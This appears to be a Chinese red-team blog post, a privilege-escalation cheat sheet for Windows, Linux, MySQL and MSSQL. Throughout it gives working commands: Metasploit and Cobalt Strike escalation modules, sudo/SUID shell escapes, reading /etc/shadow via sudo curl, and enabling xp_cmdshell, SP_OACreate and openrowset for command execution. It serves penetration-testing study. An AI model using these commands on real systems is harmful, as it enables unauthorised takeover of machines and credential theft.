                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            Weblogic SSRF漏洞
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/08/12/%E3%80%905%E3%80%91%E4%B8%AD%E9%97%B4%E4%BB%B6%E5%AE%89%E5%85%A8/WebLogic/Weblogic%20SSRF%E6%BC%8F%E6%B4%9E/Weblogic%20SSRF%E6%BC%8F%E6%B4%9E/">Weblogic SSRF漏洞</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            【0】WebLogic-Server介绍
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/08/12/%E3%80%905%E3%80%91%E4%B8%AD%E9%97%B4%E4%BB%B6%E5%AE%89%E5%85%A8/WebLogic/%E3%80%900%E3%80%91WebLogic-Server%E4%BB%8B%E7%BB%8D/WebLogic-Server%E4%BB%8B%E7%BB%8D/">Weblogic-Server介绍</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            【整合重写】WebLogic漏洞扫描工具
                        </a>
                         <ul class="unstyled" id="tree" > 
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            weblogicScanner-master
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/08/12/%E3%80%905%E3%80%91%E4%B8%AD%E9%97%B4%E4%BB%B6%E5%AE%89%E5%85%A8/WebLogic/%E3%80%90%E6%95%B4%E5%90%88%E9%87%8D%E5%86%99%E3%80%91WebLogic%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E5%B7%A5%E5%85%B7/weblogicScanner-master/README/"></a></li>  </ul> 
                    </li> 
                     </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            后台文件上传漏洞（CVE-2018-2894）
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/08/12/%E3%80%905%E3%80%91%E4%B8%AD%E9%97%B4%E4%BB%B6%E5%AE%89%E5%85%A8/WebLogic/%E5%90%8E%E5%8F%B0%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2018-2894%EF%BC%89/CVE-2018-2894/">Weblogic 任意文件上传漏洞</a></li>  </ul> 
                    </li> 
                     </ul> 
                    </li> 
                     </ul> 
                    </li> 
                     </ul> 
    </div>
    <script>
        $(document).ready(function() {
            var iconFolderOpenClass  = 'fa-folder-open';
            var iconFolderCloseClass = 'fa-folder';
            var iconAllExpandClass = 'fa-angle-double-down';
            var iconAllPackClass = 'fa-angle-double-up';
            // Handle directory-tree expansion:
            // 左键单独展开目录
            $(document).on('click', '#categories a[data-role="directory"]', function (event) {
                event.preventDefault();

                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconFolderOpenClass);
                var subtree = $(this).siblings('ul');
                icon.removeClass(iconFolderOpenClass).removeClass(iconFolderCloseClass);
                if (expanded) {
                    if (typeof subtree != 'undefined') {
                        subtree.slideUp({ duration: 100 });
                    }
                    icon.addClass(iconFolderCloseClass);
                } else {
                    if (typeof subtree != 'undefined') {
                        subtree.slideDown({ duration: 100 });
                    }
                    icon.addClass(iconFolderOpenClass);
                }
            });
            // 右键展开下属所有目录
            $('#categories a[data-role="directory"]').bind("contextmenu", function(event){
                event.preventDefault();
                
                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconFolderOpenClass);
                var listNode = $(this).siblings('ul');
                var subtrees = $.merge(listNode.find('li ul'), listNode);
                var icons = $.merge(listNode.find('.fa'), icon);
                icons.removeClass(iconFolderOpenClass).removeClass(iconFolderCloseClass);
                if(expanded) {
                    subtrees.slideUp({ duration: 100 });
                    icons.addClass(iconFolderCloseClass);
                } else {
                    subtrees.slideDown({ duration: 100 });
                    icons.addClass(iconFolderOpenClass);
                }
            })
            // 展开关闭所有目录按钮
            $(document).on('click', '#allExpand', function (event) {
                event.preventDefault();
                
                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconAllExpandClass);
                icon.removeClass(iconAllExpandClass).removeClass(iconAllPackClass);
                if(expanded) {
                    $('#sidebar .fa.fa-folder').removeClass('fa-folder').addClass('fa-folder-open')
                    $('#categories li ul').slideDown({ duration: 100 });
                    icon.addClass(iconAllPackClass);
                } else {
                    $('#sidebar .fa.fa-folder-open').removeClass('fa-folder-open').addClass('fa-folder')
                    $('#categories li ul').slideUp({ duration: 100 });
                    icon.addClass(iconAllExpandClass);
                }
            });  
        });
    </script>

    
    <div id="toTop" class="fa fa-angle-up"></div>
</aside>
            
            <section id="main"><article id="post-【3】红蓝对抗/【4 红队】权限维持/权限维持之权限提升" class="article article-type-post" itemscope itemprop="blogPost">
    <div class="article-inner">
        
        
            <header class="article-header">
                
                    <div class="article-meta">
                        
    <div class="article-category">
    	<i class="fa fa-folder"></i>
        <a class="article-category-link" href="/categories/%E3%80%903%E3%80%91%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97/">【3】红蓝对抗</a><i class="fa fa-angle-right"></i><a class="article-category-link" href="/categories/%E3%80%903%E3%80%91%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97/%E3%80%904-%E7%BA%A2%E9%98%9F%E3%80%91%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/">【4 红队】权限维持</a>
    </div>

                        
                        
    <div class="article-date">
        <i class="fa fa-calendar"></i>
        <a href="/2020/08/06/%E3%80%903%E3%80%91%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97/%E3%80%904%20%E7%BA%A2%E9%98%9F%E3%80%91%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E4%B9%8B%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/">
            <time datetime="2020-08-06T01:46:00.690Z" itemprop="datePublished">2020-08-06</time>
        </a>
    </div>


                        
                            <i class="fa fa-bar-chart"></i>
                            <span id="busuanzi_container_site_pv"><span id="busuanzi_value_page_pv"></span></span>    
                        

                    </div>
                
                
    
        <h1 class="article-title" itemprop="name">
            【3 红队】权限维持之--权限提升
        </h1>
    

            </header>
        
        
        <div class="article-entry" itemprop="articleBody">
        
        
            
        
        
            <h1 id="提权的基础概念"><a href="#提权的基础概念" class="headerlink" title="提权的基础概念"></a>提权的基础概念</h1><p><strong>Windows上常见的权限分类：</strong></p>
<blockquote>
<p>User：普通用户权限；</p>
<p>Administrator：管理员权限；</p>
<p>System：系统权限。</p>
</blockquote>
<p><strong>Linux上权限分类：</strong></p>
<blockquote>
<p>User：普通用户权限；</p>
<p>www-data：Web服务的权限，比User还要低，一般通过Web漏洞获取的Webshell就是这个权限；</p>
<p>root：Linux系统最高权限。</p>
</blockquote>
<p><strong>纵向提权：</strong>低权限角色获取高权限角色的权限。</p>
<p><strong>横向提权：</strong>在系统A中获取了系统B中同级别的角色权限。</p>
<p><strong>常用的提权方法：</strong></p>
<p>系统内核溢出漏洞提权、服务器中间件漏洞提权、数据库提权、其它第三方组件提权（利用率较高）。</p>
<p>利用windows系统错误配置提权（可信服务路径漏洞，组策略首选项等，利用率不高）。</p>
<h1 id="Windows提权"><a href="#Windows提权" class="headerlink" title="Windows提权"></a>Windows提权</h1><p><strong>LOLBAS</strong>（计划任务、文件传输、本地提权） <a href="https://lolbas-project.github.io/" target="_blank" rel="noopener">https://lolbas-project.github.io/</a> </p>
<h2 id="内核漏洞提权"><a href="#内核漏洞提权" class="headerlink" title="内核漏洞提权"></a>内核漏洞提权</h2><table>
<thead>
<tr>
<th align="left">漏洞代号</th>
<th align="left">补丁编号</th>
<th align="left">适用平台</th>
<th align="left">用途</th>
</tr>
</thead>
<tbody><tr>
<td align="left">MS14-058</td>
<td align="left">KB3000061</td>
<td align="left">03，08，12，Win7</td>
<td align="left">本地提权</td>
</tr>
<tr>
<td align="left">MS14-068</td>
<td align="left">KB3011780</td>
<td align="left">域控未安装补丁的域内，03，08，12，Win7</td>
<td align="left">域内提权</td>
</tr>
<tr>
<td align="left">MS15-051</td>
<td align="left">KB3057191</td>
<td align="left">03，08，12，Win7</td>
<td align="left">本地提权</td>
</tr>
<tr>
<td align="left">MS16-032</td>
<td align="left">KB3143141</td>
<td align="left">08 r2以后，12，Win7</td>
<td align="left">本地提权</td>
</tr>
<tr>
<td align="left">MS17-010</td>
<td align="left">KB4013389</td>
<td align="left">03，08，12，16，win7</td>
<td align="left">远程注入dll</td>
</tr>
</tbody></table>
<p><strong>快速检测目标系统未打漏洞补丁</strong></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">systeminfo &gt; temp.txt&amp;(<span class="keyword">for</span> %i <span class="keyword">in</span> (KB3000061 KB3011780 KB3057191 KB3143141 KB4013389) <span class="keyword">do</span> @<span class="built_in">type</span> temp.txt|@find /i  <span class="string">"%i"</span>|| @<span class="built_in">echo</span> %i Not Installed!)&amp;del /f /q /a temp.txt</span><br></pre></td></tr></table></figure>

<p>补丁号根据自己需求加，利用的话<code>MSF</code>中有相关EXP或者自行搜索（<code>Github</code>， <code>searchsploit</code> ）</p>
<h2 id="利用MSF提权"><a href="#利用MSF提权" class="headerlink" title="利用MSF提权"></a>利用MSF提权</h2><p>在拿到一个Meterpreter的前提下进行</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment">#根据漏洞编号，枚举系统中未安装带的补丁</span></span><br><span class="line">use post/windows/gather/enum_patches</span><br><span class="line"></span><br><span class="line"><span class="comment">#快速识别系统中可利用的漏洞</span></span><br><span class="line">use post/multi/recon/local_exploit_suggester</span><br><span class="line"></span><br><span class="line"><span class="comment">#ms14_058</span></span><br><span class="line">use exploit/windows/<span class="built_in">local</span>/ms14_058_track_popup_menu</span><br><span class="line"></span><br><span class="line"><span class="comment">#ms15_051</span></span><br><span class="line">exploit/windows/<span class="built_in">local</span>/ms15_051_client_copy_image</span><br><span class="line"></span><br><span class="line"><span class="comment">#ms16_032</span></span><br><span class="line">exploit/windows/<span class="built_in">local</span>/ms16_032_secondary_logon_handle_privesc</span><br><span class="line"></span><br><span class="line"><span class="comment">#ms17_010</span></span><br><span class="line">use exploit/windows/smb/ms17_010_eternalblue</span><br></pre></td></tr></table></figure>

<p><strong>系统服务权限配置错误</strong> </p>
<p>如果meterpreter以管理员权限运行，该模块会创建一个新服务；</p>
<p>如果当前权限不允许创建服务，该模块会判断哪些文件或文件夹的权限有问题，并对其进行劫持。</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment">#拿到一个本地管理员权限的meterpreter，可提升到SYSTEM</span></span><br><span class="line">use exploit/windows/<span class="built_in">local</span>/service_permissions</span><br></pre></td></tr></table></figure>

<p><strong>BypassUAC（只适用Win7）</strong></p>
<blockquote>
<p> UAC（User Account Control，用户账户控制），在执行影计算机运行的操作时，会弹窗提示用户要求认证。 </p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment">#拿到一个低权限本地用户的meterpreter</span></span><br><span class="line">use exploit/windows/<span class="built_in">local</span>/bypassuac</span><br></pre></td></tr></table></figure>

<h2 id="利用Cobalt-Strike提权"><a href="#利用Cobalt-Strike提权" class="headerlink" title="利用Cobalt Strike提权"></a>利用Cobalt Strike提权</h2><p>Cobalt Strike 附带了一些绕过 <code>UAC</code> 的攻击，但如果当前用户不是管理员(Administrator)， 攻击会失效。</p>
<p>Beacon默认回连时间（心跳时间）为60秒，为了更快的渗透修改成0秒，交互模式。</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">sleep 0	</span><br><span class="line"><span class="comment">#心跳时间设快了容易被发现，实际攻击不建议设太快</span></span><br><span class="line"></span><br><span class="line">shell whoami</span><br></pre></td></tr></table></figure>

<p><strong>如果你有一个Administrator权限的Beacon，用以下命令提升到SYSTEM权限：</strong></p>
<p>这个需要创建服务</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">elevate svc-exe test1（你的监听器）</span><br></pre></td></tr></table></figure>

<p><strong>如果你是普通<code>本地</code>用户权限，用以下命令提升到高权限</strong></p>
<p>注意：如果是<code>域</code>用户会弹出认证窗口，不能提权</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">elevate uac-token-duplication test1</span><br></pre></td></tr></table></figure>

<p>然后可以用上边的<code>svc-exe</code>提权到SYSTEM</p>
<h2 id="C-版的烂土豆（来自QAX零队）"><a href="#C-版的烂土豆（来自QAX零队）" class="headerlink" title="C#版的烂土豆（来自QAX零队）"></a>C#版的烂土豆（来自QAX零队）</h2><p>项目地址：<a href="https://github.com/uknowsec/SweetPotato" target="_blank" rel="noopener">https://github.com/uknowsec/SweetPotato</a></p>
<p>能在webshell下执行命令的版本 </p>
<h1 id="Linux提权"><a href="#Linux提权" class="headerlink" title="Linux提权"></a>Linux提权</h1><p><strong>GTFOBins</strong>（sudo滥用和SUID提权命令查询）<a href="https://gtfobins.github.io/" target="_blank" rel="noopener">https://gtfobins.github.io/</a></p>
<h2 id="密码复用"><a href="#密码复用" class="headerlink" title="密码复用"></a>密码复用</h2><p> 如数据库、后台 web 密码，可能就是 root 密码</p>
<h2 id="内核溢出漏洞提权"><a href="#内核溢出漏洞提权" class="headerlink" title="内核溢出漏洞提权"></a>内核溢出漏洞提权</h2><p><strong>信息收集</strong></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">uname -a#查看系统版本内核信息</span><br></pre></td></tr></table></figure>

<p><strong>使用 <code>searchsploit</code> 查找相关内核漏洞</strong></p>
<p>下载地址：<a href="https://github.com/offensive-security/exploitdb" target="_blank" rel="noopener">https://github.com/offensive-security/exploitdb</a></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">searchsploit linux 3.10 CentOS Linux 7</span><br></pre></td></tr></table></figure>

<p><strong>或使用 <code>linux-exploit-suggester-2.pl</code> 在目标机器上执行</strong></p>
<p>下载地址：<a href="https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl" target="_blank" rel="noopener">https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl</a></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">.&#x2F;linux-exploit-suggester-2.pl</span><br></pre></td></tr></table></figure>

<h2 id="sudo滥用"><a href="#sudo滥用" class="headerlink" title="sudo滥用"></a>sudo滥用</h2><p> <code>/etc/sudoers</code>文件定义可以执行 sudo 的账户、定义某个应用程序用 root 访问、是否需要密码验证</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">sudo -l	<span class="comment">#查看当前用户可以sudo的程序</span></span><br></pre></td></tr></table></figure>

<p><strong>AWK：</strong></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">sudo awk &#39;BEGIN &#123;system(&quot;&#x2F;bin&#x2F;sh&quot;)&#125;&#39;	#通过生成交互式系统外Shell序来脱离受限环境，需要普通用户的密码</span><br></pre></td></tr></table></figure>

<p><strong>CURL：</strong></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">sudo curl file:&#x2F;&#x2F;&#x2F;etc&#x2F;shadow</span><br></pre></td></tr></table></figure>

<h2 id="SUID提权"><a href="#SUID提权" class="headerlink" title="SUID提权"></a>SUID提权</h2><p>SUID 是一种特殊的文件属性，它允许用户执行的文件以该文件的拥有者的身份运行【ls 查看时有 s 属性才支持 SUID】</p>
<p><strong>查找正在系统上运行的所有SUID可执行文件</strong></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">find / -user root -perm -4000 -<span class="built_in">print</span> 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p><strong>比如发现了find</strong></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment">#随便新建一个文件，或利用已有文件</span></span><br><span class="line">touch abc</span><br><span class="line"></span><br><span class="line"><span class="comment">#以SUID即root权限执行命令</span></span><br><span class="line">find abc -<span class="built_in">exec</span> whomai \;</span><br></pre></td></tr></table></figure>

<p><strong>nmap SUID提权</strong></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment">#2.02 to 5.21版本 用交互模式执行shell命令</span></span><br><span class="line">sudo nmap --interactive		</span><br><span class="line">nmap&gt; !sh</span><br></pre></td></tr></table></figure>

<h2 id="su-root被禁止登录"><a href="#su-root被禁止登录" class="headerlink" title="su root被禁止登录"></a>su root被禁止登录</h2><blockquote>
<p>拿到 root 密码，端口转发，代理，但防火墙禁止其他人登录 root；</p>
<p>用原来的低权限 shell，也无法 sudo 切换 root  </p>
<p>因为出于安全考虑，linux 要求用户必须从终端设备（tty）中输入密码，而不是标准输入（stdin）</p>
<p>所以 sudo 在你输入密码的时候本质上是读取了键盘，而不是读取 bash 里面输入的字符</p>
</blockquote>
<p><strong>利用python获取交互Shell</strong></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">python -c <span class="string">'import pty;pty.spawn("/bin/sh")'</span></span><br><span class="line">sudo su</span><br></pre></td></tr></table></figure>

<h1 id="数据库提权"><a href="#数据库提权" class="headerlink" title="数据库提权"></a>数据库提权</h1><h2 id="MySQL数据库提权"><a href="#MySQL数据库提权" class="headerlink" title="MySQL数据库提权"></a>MySQL数据库提权</h2><h3 id="MOF提权"><a href="#MOF提权" class="headerlink" title="MOF提权"></a>MOF提权</h3><p>MOF文件是mysql数据库的扩展文件（在c:/windows/system32/wbem/mof/nullevt.mof）</p>
<p>叫做”托管对象格式”，其作用是每隔五秒就会去监控进程创建和死亡</p>
<p><strong>利用条件：</strong></p>
<blockquote>
<p><code>Windows&lt;=2003</code></p>
<p>mysql在c:/windows/system32/wbem/mof目录有写权限</p>
<p>已知数据库root账号密码</p>
<p>数据库允许外连</p>
<p>secure_file_priv为空</p>
</blockquote>
<p>当<code>secure_file_priv</code>的值没有具体值时，表示不对<code>MySQL</code>的导入|导出做限制，如果是null，表示<code>MySQL</code>不允许导入导出</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment">#查看secure_file_priv的值</span></span><br><span class="line">SHOW VARIABLES LIKE <span class="string">"secure_file_priv"</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">#这个值可以在my.ini设置为空</span></span><br><span class="line">secure_file_priv =</span><br></pre></td></tr></table></figure>

<p><strong>提权原理：</strong></p>
<blockquote>
<p>MOF文件既然每五秒就会执行，而且是系统权限；</p>
<p>我们通过mysql将文件写入一个MOF文件替换掉原有的MOF文件；</p>
<p>然后系统每隔五秒就会执行一次我们上传的MOF。</p>
<p>MOF当中有一段是vbs脚本，我们可以通过控制这段vbs脚本的内容让系统执行命令，进行提权。</p>
</blockquote>
<p>这个提权方式条件非常严苛，数据库在system32写文件这个条件一般很难达到，而且较新的系统无法使用MOF提权。</p>
<p> <strong>MSF 下有Mof 提权模块</strong> </p>
<p> 执行成功后会直接反弹一个 <code>system</code>权限的meterpreter 。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">use exploit&#x2F;windows&#x2F;mysql&#x2F;mysql_mof</span><br></pre></td></tr></table></figure>

<h3 id="UDF提权"><a href="#UDF提权" class="headerlink" title="UDF提权"></a>UDF提权</h3><p>UDF(user-defined function)是MySQL的一个拓展接口，也可称之为<strong>用户自定义函数</strong></p>
<p>用户可以通过自己增加函数对mysql功能进行扩充，文件后缀为.dll</p>
<p><strong>利用条件：</strong></p>
<blockquote>
<p><code>Server 2003、Windows XP、Windows 7</code></p>
<p>已知mysql中root的账号密码</p>
<p>mysql版本 &lt; 5.2 , UDF导出到系统目录c:/windows/system32/</p>
<p>mysql版本 &gt; 5.2 ，UDF导出到安装路径MySQL\Lib\Plugin\</p>
<p>secure_file_priv为空</p>
</blockquote>
<p><strong>提权原理：</strong></p>
<blockquote>
<p>利用root权限，创建带有调用cmd函数的’udf.dll’(动态链接库)</p>
<p>当我们把’udf.dll’导出指定文件夹引入Mysql时，其中的调用函数拿出来当作mysql的函数使用。</p>
<p>这样我们自定义的函数才被当作本机函数执行。</p>
<p>在使用CREAT FUNCITON调用dll中的函数后，mysql账号转化为system权限，从而提权</p>
</blockquote>
<p>可以直接查询插件安装目录：</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">show variables like %plugin%</span><br></pre></td></tr></table></figure>

<p> 如果plugin不存在，可以用NTFS ADS流来创建文件夹并导入dll</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment">#先找到Mysql的目录select @@basedir;#利用ADS流来创建plugin文件夹（测试并不能成功创建）select 'It is dll' into dumpfile 'C:\\phpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';</span></span><br></pre></td></tr></table></figure>

<p>网上流传的是在数据库中直接就能利用ADS流创建plugin文件夹，但我测试发现直接导入文件可以，并不能创建文件夹。</p>
<p>但是利用ADS流确实能创建文件夹，如以下命令（可以自己测试一下）</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">echo</span> 123 &gt; <span class="built_in">test</span>::<span class="variable">$INDEX_ALLOCATION</span></span><br><span class="line"><span class="comment">#这条命令会创建一个test文件夹</span></span><br></pre></td></tr></table></figure>

<p>所以我是用<code>Webshell</code>这样创建的plugin文件夹：</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">echo</span> 123 &gt; C:\phpStudy\PHPTutorial\MySQL\lib\plugin::<span class="variable">$INDEX_ALLOCATION</span></span><br></pre></td></tr></table></figure>

<p><strong>有一个自动化工具</strong>：<a href="https://github.com/T3st0r-Git/HackMySQL" target="_blank" rel="noopener">https://github.com/T3st0r-Git/HackMySQL</a> </p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment">#上边的创建plugin目录步骤完成后直接利用即可</span></span><br><span class="line">python root.py -a 192.168.2.9 -proot -e <span class="string">"whoami"</span></span><br></pre></td></tr></table></figure>

<p> <strong>通过WebShell上传udf.php（这种方法数据库不用外连也可以）</strong> </p>
<p> udf.php：<a href="https://github.com/echohun/tools/blob/master/%E5%A4%A7%E9%A9%AC/udf.php" target="_blank" rel="noopener">https://github.com/echohun/tools/blob/master/%E5%A4%A7%E9%A9%AC/udf.php</a> </p>
<p><img src="/images/image-20200521135047931.png" alt=""></p>
<h2 id="MSSQL数据库提权"><a href="#MSSQL数据库提权" class="headerlink" title="MSSQL数据库提权"></a>MSSQL数据库提权</h2><p><strong>首先查看权限</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="comment">--是否sa权限，返回 1 就是sa</span></span><br><span class="line"><span class="keyword">select</span> IS_SRVROLEMEMBER(<span class="string">'sysadmin'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">--是否dba权限，返回 1 就是DBA</span></span><br><span class="line"><span class="keyword">select</span> IS_MEMBER(<span class="string">'db_owner'</span>)</span><br></pre></td></tr></table></figure>

<h3 id="一、xp-cmdshell"><a href="#一、xp-cmdshell" class="headerlink" title="一、xp_cmdshell"></a>一、xp_cmdshell</h3><blockquote>
<p><strong>适用(xp\2000\2003系统)</strong></p>
<p>前提是MSSQL是以system用户运行的，才能提权；</p>
<p>如果用nt authority\network service运行，是没有系统权限的。</p>
</blockquote>
<p>默认情况下是关闭的，用下边的命令开启</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">EXEC sp_configure '<span class="keyword">show</span> <span class="keyword">advanced</span> options<span class="string">', 1; --允许修改高级参数</span></span><br><span class="line"><span class="string">RECONFIGURE;</span></span><br><span class="line"><span class="string">EXEC sp_configure '</span>xp_cmdshell<span class="string">', 1; --打开xp_cmdshell扩展</span></span><br><span class="line"><span class="string">RECONFIGURE;</span></span><br></pre></td></tr></table></figure>

<p>如果xp_cmdshell被删除，可以尝试上传<code>xplog70.dll</code> <a href="https://fix4dll.com/xplog70_dll" target="_blank" rel="noopener">https://fix4dll.com/xplog70_dll</a> 进行恢复，恢复语句：</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">Exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\\xplog70.dll';</span><br></pre></td></tr></table></figure>

<p>然后执行命令</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">exec xp_cmdshell 'whoami';</span><br></pre></td></tr></table></figure>

<h3 id="二、SP-OACreate"><a href="#二、SP-OACreate" class="headerlink" title="二、SP_OACreate"></a>二、SP_OACreate</h3><blockquote>
<p><strong>适用(xp\2000\2003系统)</strong></p>
</blockquote>
<p>当xp_cmdshell 删除以后，还可以使用SP_OACreate</p>
<p><strong>首先要打开组件：</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="comment">--开启EXEC</span></span><br><span class="line">sp_configure '<span class="keyword">show</span> <span class="keyword">advanced</span> options<span class="string">', 1;</span></span><br><span class="line"><span class="string">RECONFIGURE;</span></span><br><span class="line"><span class="string">EXEC sp_configure '</span>Ole Automation Procedures<span class="string">', 1;</span></span><br><span class="line"><span class="string">RECONFIGURE;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">--关闭EXEC</span></span><br><span class="line"><span class="string">sp_configure '</span><span class="keyword">show</span> <span class="keyword">advanced</span> options<span class="string">', 0;</span></span><br><span class="line"><span class="string">RECONFIGURE;</span></span><br><span class="line"><span class="string">EXEC sp_configure '</span>Ole Automation Procedures<span class="string">', 0;</span></span><br><span class="line"><span class="string">RECONFIGURE;</span></span><br></pre></td></tr></table></figure>

<p><strong>之后使用以下语句执行命令：</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">declare</span> @shell <span class="built_in">int</span> exec sp_oacreate <span class="string">'wscript.shell'</span>,@shell <span class="keyword">output</span> exec sp_oamethod @shell,<span class="string">'run'</span>,<span class="literal">null</span>,<span class="string">'c:\windows\system32\cmd.exe /c whoami &gt;c:\\1.txt'</span></span><br></pre></td></tr></table></figure>

<p><strong>这种方式是无回显的，打开1.txt查看命令执行结果</strong></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">type</span> c:\\1.txt</span><br></pre></td></tr></table></figure>

<h3 id="三、openrowset沙盒"><a href="#三、openrowset沙盒" class="headerlink" title="三、openrowset沙盒"></a>三、openrowset沙盒</h3><blockquote>
<p><strong>(2003系统可用、2012-r2实验失败)</strong></p>
</blockquote>
<p><strong>首先检查cmd_shell是否开启</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">count</span>(*) <span class="keyword">from</span> master.dbo.sysobjects <span class="keyword">where</span> xtype=<span class="string">'x'</span> <span class="keyword">and</span> <span class="keyword">name</span>=<span class="string">'xp_cmdshell'</span></span><br><span class="line"><span class="comment">--结果为 1 就是开启</span></span><br></pre></td></tr></table></figure>

<p><strong>第二步 开启默认关闭的xp_regwrite存储过程</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="comment">--开启</span></span><br><span class="line">EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE' ,'SOFTWARE\Microsoft\Jet\4.0\Engines' ,'SandBoxMode' ,'REG_DWORD' ,0;</span><br><span class="line"></span><br><span class="line">EXEC sp_configure '<span class="keyword">show</span> <span class="keyword">advanced</span> options<span class="string">', 1</span></span><br><span class="line"><span class="string">GO</span></span><br><span class="line"><span class="string">RECONFIGURE</span></span><br><span class="line"><span class="string">GO</span></span><br><span class="line"><span class="string">EXEC sp_configure '</span>Ad Hoc <span class="keyword">Distributed</span> Queries<span class="string">', 1</span></span><br><span class="line"><span class="string">GO</span></span><br><span class="line"><span class="string">RECONFIGURE</span></span><br><span class="line"><span class="string">GO</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">--利用完后恢复</span></span><br><span class="line"><span class="string">EXEC master..xp_regwrite '</span>HKEY_LOCAL_MACHINE<span class="string">','</span>SOFTWARE\Microsoft\Jet\<span class="number">4.0</span>\<span class="keyword">Engines</span><span class="string">','</span>SandBoxMode<span class="string">','</span>REG_DWORD<span class="string">',1;</span></span><br><span class="line"><span class="string">EXEC sp_configure '</span>Ad Hoc <span class="keyword">Distributed</span> Queries<span class="string">',0;reconfigure;</span></span><br><span class="line"><span class="string">EXEC sp_configure '</span><span class="keyword">show</span> <span class="keyword">advanced</span> options<span class="string">',0;reconfigure;</span></span><br></pre></td></tr></table></figure>

<p><strong>利用jet.oledb执行系统命令</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> openrowset(<span class="string">'microsoft.jet.oledb.4.0'</span> ,<span class="string">';database=c:\windows\system32\ias\ias.mdb'</span> ,<span class="string">'select shell("cmd.exe /c whoami &gt; c:\\666.txt")'</span>)</span><br></pre></td></tr></table></figure>

<p>这个也是无回显的</p>
<p><strong>沙盒模式SandBoxMode参数含义（默认是2）</strong></p>
<blockquote>
<p><code>0</code>：在任何所有者中禁止启用安全模式</p>
<p><code>1</code> ：为仅在允许范围内</p>
<p><code>2</code> ：必须在access模式下</p>
<p><code>3</code>：完全开启</p>
</blockquote>
<p>openrowset是可以通过OLE DB访问SQL Server数据库</p>
<p>OLE DB是应用程序链接到SQL Server的的驱动程序</p>
<p><strong>PowerUpSQL工具</strong>：<a href="https://github.com/NetSPI/PowerUpSQL" target="_blank" rel="noopener">https://github.com/NetSPI/PowerUpSQL</a></p>
